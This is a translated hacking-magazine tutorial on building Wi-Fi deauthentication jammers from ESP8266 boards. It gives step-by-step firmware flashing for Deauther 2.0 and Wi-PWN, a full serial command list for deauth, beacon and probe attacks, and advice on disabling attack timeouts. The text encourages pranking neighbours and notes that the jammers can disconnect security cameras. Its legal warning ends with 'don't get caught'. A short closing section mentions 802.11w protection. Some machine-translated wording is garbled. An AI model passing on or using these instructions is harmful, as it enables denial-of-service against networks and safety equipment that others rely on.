Hello, running in the shadows! Hello, random subscriber. Today we will talk about such a cool thing as Wi-Fi jammer, or Wi-Fi jammer. So, this is a gadget that is designed to disconnect wireless devices from the hotspot. Why is this necessary? You can imagine both a friendly prank (the neighbor, of course, will be happy when you cut off his porn or, for example, a football match at the most interesting place), and criminal use: an attacker can disconnect security cameras or other important equipment from the network. In this article, we will look at what inexpensive hardware deauthenticators are available, how to use them, and how to protect yourself from such attacks.
Go:
How the jammer works
Unlike real jammers, which interrupt the radio transmitter signal with their stronger signal, the deauthenticator works at the software level. [/B]It implements a denial-of-service attack by sending a deauthentication frame to the router on behalf of devices connected to the network. Since this frame is not encrypted in any way, it is enough for the jammer to find out the MAC addresses of devices by sniffing traffic on the network.
Usually, deauthentication is part of a complex attack on the network. It is used to create an "evil double" of an access point or to intercept a handshake, which then allows you to decrypt the password. However, a silencer can also be useful on its own.
WARNING
We strongly recommend that you use all these tips for educational purposes only. Blocking of data transmission and use of the considered means may be prosecuted by law. To perform penetration tests, you need to receive a corresponding written confirmation from the customer. Remember that data about deauthorization is saved in the router logs. Simply put, cyberstalkers, don't get caught. If you're caught, you won't live to see the trial.
Recently, inexpensive and miniature boards with support for the NodeMCU software platform have become very popular. They are built on the ESP8266 module, which implements work with Wi-Fi according to the 802.11 b/g/n standard at a frequency of 2.4 GHz. Now there are two variants of such boards: with the CP2102 chip of the American company Silicon Labs or with the Chinese CH340.
These boards are positioned as devices for prototyping: on their basis, craftsmen create automated systems controlled via Wi-Fi. The topic itself is quite exciting, but we are now interested in something else — the possibility of using NodeMCU to conduct attacks.
For full-fledged monitoring and packet injection, ESP8266 is unsuitable due to technical limitations, but it can be used as a deauthenticator — which led to the appearance of the corresponding firmware. Last year, a good person with the pseudonym Spacehuhn released the first of them, but since then other versions have appeared — with additional features. However, before moving on to software, let's decide on the choice of hardware.
This article will demonstrate the process using the example of the board of the Chinese manufacturer Dstike: it has ESP8266 and there are modes of operation as a client (P2P) and an access point (soft-AP). You can control the card from your smartphone or any other device with Wi-Fi.
Important! The performance of the software does not depend on either the chip or the board — you can choose any option at your discretion. Dstike products alone have several variants in different versions and for use in different situations. All of them have one thing in common — the ability to jam networks.
Types of Dstike devices
Deauther Wristband - a wristband with a built-in display, battery and switch. Convenient device for quick access to the control panel.
Deauther Power Bank - with a modified charge controller; control is carried out through a special panel. The controller has a connector for connecting an external antenna. Batteries are not included. This is an inconspicuous device that you can easily leave somewhere and use remotely.
Deauther OLED V3. 5 — in this version you will additionally get a connector for connecting an external antenna and a holder for a 18650 mAh battery. The device is controlled using buttons and a switch, and the output is sent to the screen, which allows you to use this option without additional equipment.
The main advantage of these gadgets is the ability to select a specific network or all at once within the range of the device. Just in case, you don't need a Wi-Fi password to conduct attacks!
Installing Deauther 2.0
Let's start with Deauther 2.0, the same firmware that Spacehuhn developed. In its GitHub repository, you can choose the version for a specific board.
Files with the bin extension are compiled sketches. They need to be installed on the board via a special bootloader. But if you want, then in the source code archives you will find libraries and sketches that can be delivered via the Arduino IDE.
Loading.bin
If you chose the option with downloading the binary, then first run the NodeMCU Flasher program. You can download it from the NodeMCU repository.
Install the drivers for CP2102 or CH340. After that, connect the board to the computer, open the NodeMCU Flasher program, select the COM port in the device Manager in the "Ports (COM and LPT)"section. Now go to the Config tab, click on the gear and select the downloaded .bin file.
After adding a file, the path appears in the line to the left. Go to the Operation tab and click on Flash - the firmware will then be loaded into the board.
Uploading via the Arduino IDE
If it is more convenient for you to install via the Arduino IDE, then the process is slightly different. First of all, we download the drivers in the same way (CP2102, CH340). Then open the Arduino IDE and in the "File" menu, look for "Settings", click on "Add a link for the board manager" and insert two links:
- http://arduino.esp8266.com/stable/package_esp8266com_index.json
- http://phpsecu.re/esp8266/package_deauther_index.json
Open the "Tools" tab and select "Board Manager" from the "Board:..." menu.
Select "Made" and install arduino-esp-8266-deautherand esp8266.
Open the folder with the sketch and libraries, go to "Tools". The settings should look like I have in the screenshot.
In the "Board" line, select ESP8266 Deauther Modules from the list.
In the Flash size line, select your module. Set the firmware and memory size as shown in the picture below.
Next, download the firmware.
After enabling it, the card will create an access point. Connect to it and go to the address 192.168.4.1 or deauth.me. You will get to the configurator and see a warning.
In the configuration section, in the LANG line, specify ru to enable the Russian language in the web interface. For the settings to take effect, click on "Save" and restart the device. Now it's ready to go, you can start spoiling the life of your neighbors.
Overview of features and settings
Let's take a quick look at the app and see what our headscarf is now capable of.
If you connect the jammer via the serial port, you can use commands to control the jammer. You can disable this feature in the settings by unchecking SERIAL.
Commands for serial port control
- scan [<all/aps/stations>] [-t <time>] [-c <continue-time>] [-ch <channel>]
- show [selected] [<all/aps/stations/names/ssids>]
- select [<all/aps/stations/names>] [<id>]
- deselect [<all/aps/stations/names>] [<id>]
- add ssid <ssid> [-wpa2] [-cl <clones>]
- add ssid -ap <id> [-cl <clones>] [-f]
- add ssid -s [-f]
- add name <name> [-ap <id>] [-s]
- add name <name> [-st <id>] [-s]
- add name <name> [-m <mac>] [-ch <channel>] [-b <bssid>] [-s]
- set name <id> <newname>
- enable random <interval>
- disable random
- load [<all/ssids/names/settings>] [<file>]
- save [<all/ssids/names/settings>] [<file>]
- remove <ap/station/name/ssid> <id>
- remove <ap/station/names/ssids> [all]
- attack [beacon] [deauth] [deauthall] [probe] [nooutput] [-t <timeout>]
- attack status [<on/off>]
- stop <all/scan/attack>
- sysinfo
- clear
- format
- print <file> [<lines>]
- delete <file> [<lineFrom>] [<lineTo>]
- replace <file> <line> <new-content>
- copy <file> <newfile>
- rename <file> <newfile>
- run <file>
- write <file> <commands>
- get <setting>
- set <setting> <value>
- reset
- chicken
- reboot
- info
- // <comments>
- send deauth <apMac> <stMac> <rason> <channel>
- send beacon <mac> <ssid> <ch> [wpa2]
- send probe <mac> <ssid> <ch>
- led <r> <g> <b> [<brightness>]
- led <#rrggbb> [<brightness>]
- led <enable/disable>
- draw
- screen <on/off>
- screen mode <menu/packetmonitor/buttontest/loading>
After 600 seconds of starting attacks, they will automatically stop. If you don't want this to happen, you can manually set the time-based shutdown by setting the value in the ATTACKTIMEOUT menu: enter 0, and attacks will stop being disabled automatically.
If you click Scan APs in the scan section, the jammer finds all Wi-Fi access points. Choose one or more networks, and you can go to the attacks section. Deauth modedisconnects all devices from the selected network. Beacon mode allows you to create up to 60 access points simultaneously.
The SSIDs section creates access points for the Beacon attack.
The firmware provides the ability to connect the display — for the version of the device with it. But if you want, you can solder the screen and buttons to the board yourself, as well as provide autonomous power to turn it into an independent device.
Also, firmware developers, in addition to the gemmer itself, also sell a device that allows it to be detected.
The authors periodically update the firmware and add new features, so keep an eye out for updates!
Wi-PWN
Consider a similar Wi-PWN firmware that I developed Sam Denty (samdenty99). He improved Spacehuhn's creation and added deauthentication detector features, as well as creating a companion app for Android. As a result, using Wi-PWN is more convenient than using Deauther 2.0.
After downloading and unpacking the archive, you will need to flash the board and install the app on your phone. In the folder you will find the program ESP8266Flasher. Start it, select the COM port and in the Config section — the firmware (it is located on the path *\Wi-PWN-master\arduino\Wi-PWN). Now click Flash in the Operation tab.
From the phone, we connect to the payment via Wi-Fi.
Open the downloaded app, agree to the rules, and enter the network name and password. After setting up, we connect to the new Wi-Fi.
Configuring the access point and completing the installation
The app has several tabs with talking names:
- Scan - section with search and selection of multiple access points;
- Users - the function of scanning a specific Wi-Fi for connections and creating your own "users";
- Attack attacks are similar to the Spacehuhn version, but when cloning networks, the maximum number of users is 48 instead of 60 (the same number was in earlier versions of Deauther);
- Detector - a function that allows you to scan channels and detect jammers;
- Settings - configure the Wi-Fi server (network name, password). Here you can also enable the Wi-Fi client and configure the scan and attack settings.
WARNING
For stable operation of the device, I recommend attaching the radiator to the heated part of the device. Otherwise, the jumper may overheat and turn off.
A few words about protection
NodeMCU is a cheap, versatile, powerful and compact deauthentication solution. You can repeat the entire project quickly and without much effort. And since anyone can do it, it's a good idea to think about protection.
Most popular routers use IEEE 802.11 b/g/n standards, which are susceptible to jamming. If you want to eliminate this possibility, then look for a router that supports the 802.11 w standard, which fully protects users from this attack.
Some routers have anti-spam protection, but it only works with devices connected to the network, and Wi-Fi jammer does not connect to the network. If your router has anti-spam protection that works with unconnected devices, then we recommend activating it!
For those who are in the topic or really want to learn:
A selection of utilities for working with ESP8266, collected by the tenevikami brothers. Working, working, working.
xakep.ru
